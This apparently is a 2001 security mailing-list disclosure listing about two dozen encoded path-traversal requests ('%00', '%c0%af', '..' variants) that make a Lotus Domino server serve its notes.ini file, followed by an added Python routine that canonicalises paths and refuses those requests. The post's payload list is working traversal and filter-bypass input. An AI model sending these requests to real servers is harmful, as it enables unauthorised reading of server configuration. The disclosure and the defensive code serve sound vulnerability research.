From: Moonen, Ralph (Moonen.Ralph KPMG.NL)
Date: Fri Jan 12 2001 - 07:44:59 CST
I made a loop testing all combinations of up to 4 of the following elements:
(I just selected some elements that would yield possibly interesting stuff,
including a unicode encoding of '/', like in the IIS unicode bug)
/
..
/..
../
.nsf
%20
%c0%af
%00
I then did an HTTP GET of:
GET /<COMBI>/lotus/domino/notes.ini HTTP/1.0
and found that the following combinations all get the desired notes.ini file:
/%00%00.nsf/../lotus/domino/notes.ini
/%00%20.nsf/../lotus/domino/notes.ini
/%00%c0%af.nsf/../lotus/domino/notes.ini
/%00...nsf/../lotus/domino/notes.ini
/%00.nsf//../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/%00.nsf/..//lotus/domino/notes.ini
/%00.nsf/../../lotus/domino/notes.ini
/%00.nsf.nsf/../lotus/domino/notes.ini
/%20%00.nsf/../lotus/domino/notes.ini
/%20.nsf//../lotus/domino/notes.ini
/%20.nsf/..//lotus/domino/notes.ini
/%c0%af%00.nsf/../lotus/domino/notes.ini
/%c0%af.nsf//../lotus/domino/notes.ini
/%c0%af.nsf/..//lotus/domino/notes.ini
/...nsf//../lotus/domino/notes.ini
/...nsf/..//lotus/domino/notes.ini
/.nsf///../lotus/domino/notes.ini
/.nsf//../lotus/domino/notes.ini
/.nsf//..//lotus/domino/notes.ini
/.nsf/../lotus/domino/notes.ini
/.nsf/..//lotus/domino/notes.ini
/.nsf/..///lotus/domino/notes.ini
/.nsf%00.nsf/../lotus/domino/notes.ini
/.nsf.nsf//../lotus/domino/notes.ini
/.nsf.nsf/..//lotus/domino/notes.ini
Of course some of these are duplicates, since // gets parsed to /, although
not always!
Some experiments show that strange things also happen when %00 or somesuch
is prepended...
For instance:
/.nsf/../../lotus/domino/notes.ini
gives the ".. Forbidden, don't try to break in" message, while
/%00.nsf/../../lotus/domino/notes.ini
serves up the file just fine!
--Ralph
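The defensive counterpart to what the post describes, as an added example (not code from the post, and not Lotus Domino's own logic): a server or filter should percent-decode the request path exactly once, reject NUL bytes and overlong UTF-8 sequences such as %c0%af, collapse repeated slashes and resolve '..' segments, and only then apply any access-control decision. Applied to the request paths quoted above, every variant either collapses to the single canonical target or is refused outright, so an ACL keyed on the canonical path treats them all the same. The function names, the rejection policy and the "web root" boundary are this example's assumptions.

```python
"""Canonicalize-then-authorize check for HTTP request paths.

Added example, not from the original post or from Lotus Domino. The sample
request paths below are copied from the post; the verdicts are this
example's own policy, not a description of Domino's actual behaviour.
"""
from urllib.parse import unquote_to_bytes


class RejectedPath(ValueError):
    """Request path refused before it ever reaches the filesystem."""


def canonicalize(raw_path: str) -> str:
    """Return the canonical absolute path for a raw request path, or raise."""
    if not raw_path.startswith("/"):
        raise RejectedPath("path must be absolute")
    # Decode %XX exactly once. Decoding in a loop is a classic bypass
    # (%2500 -> %00 -> NUL), so never repeat this step.
    decoded = unquote_to_bytes(raw_path)
    if b"\x00" in decoded:
        raise RejectedPath("NUL byte in path")
    # Strict UTF-8 decoding rejects overlong forms such as C0 AF ('/').
    try:
        text = decoded.decode("utf-8")
    except UnicodeDecodeError:
        raise RejectedPath("invalid or overlong UTF-8 in path") from None
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in text):
        raise RejectedPath("control character in path")
    # Resolve segments: '' (from //) and '.' vanish, '..' pops, and an
    # attempt to pop past the root is refused rather than silently clamped.
    stack = []
    for segment in text.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:
                raise RejectedPath("traversal above web root")
            stack.pop()
            continue
        stack.append(segment)
    return "/" + "/".join(stack)


def inspect_request(raw_path: str):
    """Classify a request as ('reject', reason) or ('allow', canonical_path)."""
    try:
        return "allow", canonicalize(raw_path)
    except RejectedPath as exc:
        return "reject", str(exc)


# Request paths quoted in the post (constructed list, copied from the text).
SAMPLE_PATHS = [
    "/%00%00.nsf/../lotus/domino/notes.ini",
    "/%00%20.nsf/../lotus/domino/notes.ini",
    "/%00%c0%af.nsf/../lotus/domino/notes.ini",
    "/%00...nsf/../lotus/domino/notes.ini",
    "/%00.nsf//../lotus/domino/notes.ini",
    "/%00.nsf/../lotus/domino/notes.ini",
    "/%00.nsf/..//lotus/domino/notes.ini",
    "/%00.nsf/../../lotus/domino/notes.ini",
    "/%00.nsf.nsf/../lotus/domino/notes.ini",
    "/%20%00.nsf/../lotus/domino/notes.ini",
    "/%20.nsf//../lotus/domino/notes.ini",
    "/%20.nsf/..//lotus/domino/notes.ini",
    "/%c0%af%00.nsf/../lotus/domino/notes.ini",
    "/%c0%af.nsf//../lotus/domino/notes.ini",
    "/%c0%af.nsf/..//lotus/domino/notes.ini",
    "/...nsf//../lotus/domino/notes.ini",
    "/...nsf/..//lotus/domino/notes.ini",
    "/.nsf///../lotus/domino/notes.ini",
    "/.nsf//../lotus/domino/notes.ini",
    "/.nsf//..//lotus/domino/notes.ini",
    "/.nsf/../lotus/domino/notes.ini",
    "/.nsf/..//lotus/domino/notes.ini",
    "/.nsf/..///lotus/domino/notes.ini",
    "/.nsf%00.nsf/../lotus/domino/notes.ini",
    "/.nsf.nsf//../lotus/domino/notes.ini",
    "/.nsf.nsf/..//lotus/domino/notes.ini",
    "/.nsf/../../lotus/domino/notes.ini",
    "/%00.nsf/../../lotus/domino/notes.ini",
]


def summarize(paths):
    """Group request paths by verdict; shows the encoded variants collapse."""
    groups = {}
    for path in paths:
        groups.setdefault(inspect_request(path), []).append(path)
    return groups


if __name__ == "__main__":
    for (verdict, detail), paths in summarize(SAMPLE_PATHS).items():
        print(f"{verdict:6} {detail:40} {len(paths)} request(s)")
```

The two requests that the post says Domino treats differently (`/.nsf/../../...` forbidden, `/%00.nsf/../../...` served) are both refused here, for different reasons, because the NUL check and the root-boundary check run on the decoded path rather than on the raw one; that is the property a pattern match on the undecoded URL cannot give you.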